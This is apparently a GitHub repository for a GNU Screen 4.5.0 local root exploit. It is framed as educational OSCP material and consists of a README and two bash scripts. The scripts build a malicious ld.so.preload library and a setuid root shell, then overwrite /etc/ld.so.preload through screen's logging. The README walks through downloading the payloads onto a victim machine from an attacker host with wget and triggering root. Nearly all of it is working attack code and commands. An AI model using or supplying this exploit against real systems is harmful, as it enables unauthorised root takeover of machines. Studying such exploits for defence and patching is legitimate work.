├── img ├── root.png └── Front-img.png ├── README.md ├── full-exploit.sh └── exploit.sh /img/root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/HEAD/img/root.png -------------------------------------------------------------------------------- /img/Front-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/HEAD/img/Front-img.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # screen v4.5.0 Privilege Escalation 2 | `Updated GNU Screen 4.5.0 Exploit:` This repository hosts an enhanced exploit for `GNU Screen 4.5.0` that is related to OSCP Machine. It includes modifications for compatibility with the latest binary configurations in Kali Linux. Intended for educational and research purposes to demonstrate privilege escalation. 3 | - The orginal lib github-lib and exploit-db 4 | - The orginal Report Bug Report 5 | 6 |

7 | 8 | ![](https://img.shields.io/badge/Version-%20v1.0.0-blue) 9 | ![](https://img.shields.io/badge/Twitter-%20YasserREED-blue) 10 | ![](https://img.shields.io/badge/YouTube-%20YasserRED-red) 11 | 12 | 13 | 14 | ## Step - Step exploit 15 | 16 | #### Setup 17 | ```bash 18 | sudo git clone https://github.com/YasserREED/screen-v4.5.0-priv-escalate.git 19 | cd screen-v4.5.0-priv-escalate 20 | sudo chmod +x exploit.sh 21 | ./exploit.sh 22 | ``` 23 | 24 | #### Transfer the Files 25 | ```console 26 | victom@Machine$ cd /tmp 27 | victom@Machine$ wget 192.168.45.x/libhax.so 28 | victom@Machine$ wget 192.168.45.x/rootshell 29 | ``` 30 | #### Give the permissions 31 | ```console 32 | victom@Machine$ chmod +x libhax.so 33 | victom@Machine$ chmod +x rootshell 34 | ``` 35 | #### Smash to root 36 | ```bash 37 | cd /etc || exit 1 38 | umask 000 39 | screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" 40 | screen -ls 41 | /tmp/rootshell 42 | ``` 43 | 44 |
45 | 46 | --- 47 | 48 |

Hack The Planet! :heart_on_fire:

49 | -------------------------------------------------------------------------------- /full-exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # screenroot.sh 3 | # setuid screen v4.5.0 local root exploit 4 | # abuses ld.so.preload overwriting to get root. 5 | # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html 6 | # HACK THE PLANET 7 | # ~ infodox (25/1/2017) 8 | 9 | 10 | 11 | echo "···············································································································" 12 | echo ": _ _ ____ ___ _ :" 13 | echo ": ___ ___ _ __ ___ ___ _ __ __ __| || | | ___| / _ \ _ __ _ __ (_)__ __ :" 14 | echo ": / __| / __|| '__|/ _ \ / _ \| '_ \ _____\ \ / /| || |_ |___ \ | | | | _____ | '_ \ | '__|| |\ \ / / :" 15 | echo ": \__ \| (__ | | | __/| __/| | | ||_____|\ V / |__ _|_ ___) |_| |_| ||_____|| |_) || | | | \ V / :" 16 | echo ": |___/ \___||_| \___| \___||_| |_| \_/ |_| (_)|____/(_)\___/ | .__/ |_| |_| \_/ :" 17 | echo ": |_| :" 18 | echo ": :" 19 | echo ":··············································································································" 20 | 21 | 22 | 23 | echo "~ gnu/screenroot ~" 24 | echo "[+] First, we create our shell and library..." 25 | cat << EOF > /tmp/libhax.c 26 | #include 27 | #include 28 | #include 29 | #include 30 | __attribute__ ((__constructor__)) 31 | void dropshell(void){ 32 | chown("/tmp/rootshell", 0, 0); 33 | chmod("/tmp/rootshell", 04755); 34 | unlink("/etc/ld.so.preload"); 35 | printf("[+] done!\n"); 36 | } 37 | EOF 38 | 39 | gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c 40 | rm -f /tmp/libhax.c 41 | 42 | cat << EOF > /tmp/rootshell.c 43 | #include 44 | #include 45 | #include 46 | int main(void){ 47 | setuid(0); 48 | setgid(0); 49 | seteuid(0); 50 | setegid(0); 51 | execl("/bin/sh", "sh", NULL); 52 | return 0; 53 | } 54 | EOF 55 | 56 | gcc -o /tmp/rootshell /tmp/rootshell.c -static 57 | rm -f /tmp/rootshell.c 58 | 59 | echo "[+] Now we create our /etc/ld.so.preload file..." 60 | cd /etc || exit 1 # Exit if change directory fails 61 | umask 000 # because 62 | screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed 63 | echo "[+] Triggering..." 64 | screen -ls # screen itself is setuid, so... 65 | /tmp/rootshell 66 | -------------------------------------------------------------------------------- /exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # screenroot.sh 3 | # setuid screen v4.5.0 local root exploit 4 | # abuses ld.so.preload overwriting to get root. 5 | # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html 6 | # Twitter: @YasserREED 7 | # HACK THE PLANET 8 | # ~ infodox (25/1/2017) 9 | 10 | echo "···············································································································" 11 | echo ": _ _ ____ ___ _ :" 12 | echo ": ___ ___ _ __ ___ ___ _ __ __ __| || | | ___| / _ \ _ __ _ __ (_)__ __ :" 13 | echo ": / __| / __|| '__|/ _ \ / _ \| '_ \ _____\ \ / /| || |_ |___ \ | | | | _____ | '_ \ | '__|| |\ \ / / :" 14 | echo ": \__ \| (__ | | | __/| __/| | | ||_____|\ V / |__ _|_ ___) |_| |_| ||_____|| |_) || | | | \ V / :" 15 | echo ": |___/ \___||_| \___| \___||_| |_| \_/ |_| (_)|____/(_)\___/ | .__/ |_| |_| \_/ :" 16 | echo ": |_| :" 17 | echo ": :" 18 | echo ": X : @YasserREED :" 19 | echo ":··············································································································" 20 | 21 | echo "~ gnu/screenroot ~" 22 | echo "[+] First, we create our shell and library..." 23 | cat << EOF > /tmp/libhax.c 24 | #include 25 | #include 26 | #include 27 | #include 28 | __attribute__ ((__constructor__)) 29 | void dropshell(void){ 30 | chown("/tmp/rootshell", 0, 0); 31 | chmod("/tmp/rootshell", 04755); 32 | unlink("/etc/ld.so.preload"); 33 | printf("[+] done!\n"); 34 | } 35 | EOF 36 | echo "[+] libhax.c Created .." 37 | 38 | gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c 39 | rm -f /tmp/libhax.c 40 | echo "[+] Create /tmp/libhax.so .." 41 | cat << EOF > /tmp/rootshell.c 42 | #include 43 | #include 44 | #include 45 | int main(void){ 46 | setuid(0); 47 | setgid(0); 48 | seteuid(0); 49 | setegid(0); 50 | execl("/bin/sh", "sh", NULL); 51 | return 0; 52 | } 53 | EOF 54 | 55 | echo "[+] Create /tmp/rootshell .." 56 | gcc -o /tmp/rootshell /tmp/rootshell.c -static 57 | rm -f /tmp/rootshell.c 58 | 59 | echo "[+] Setup Finished!" 60 | 61 | echo "[+] Entering /tmp Folder" 62 | cd /tmp || { echo "Failed to enter /tmp folder"; exit 1; } 63 | echo "" 64 | echo "[+] Move libhax.so and rootshell to the Target Machine" 65 | echo "" 66 | echo "" 67 | echo "[Hint] You can use the below command to transfer the files" 68 | echo "[Command] python3 -m http.server 80" 69 | 70 | exec /bin/bash --------------------------------------------------------------------------------